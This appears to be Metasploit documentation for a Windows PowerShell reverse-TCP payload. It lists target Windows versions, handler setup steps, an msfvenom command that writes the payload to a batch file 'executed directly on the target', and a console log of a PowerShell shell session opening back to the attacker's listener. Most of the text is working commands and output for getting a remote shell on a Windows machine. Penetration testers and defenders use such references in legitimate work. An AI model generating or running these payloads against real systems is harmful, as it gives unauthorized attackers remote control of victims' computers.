Vulnerable Application
This PowerShell payload is suitable for the following environments:
- Windows 7
- Windows Server 2012
- Windows 10
Verification Steps
- Do: use exploit/multi/handler
- Do: set payload cmd/windows/powershell_reverse_tcp
- Do: set LHOST [IP]
- Do: set LPORT [PORT]
- Do: run
Scenarios
Generating a batch file with msfvenom
msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=192.168.0.2 LPORT=4444 -o powershell_reverse_tcp.bat
The output batch file can be executed directly on the target, or pasted as a command.
Example usage on Windows 7 target
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload cmd/windows/powershell_reverse_tcp
payload => cmd/windows/powershell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.0.2
LHOST => 192.168.0.2
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.0.2:4444
[*] Powershell session session 1 opened (192.168.0.2:4444 -> 192.168.0.2:49106 ) at 2021-11-02 12:28:28 +0000
User @ USER-PC
PS C:\Users\User> exit
[*] 192.168.0.2 - Powershell session session 1 closed.
Options
LOAD_MODULES
A list of PowerShell modules (separated by commas) to download.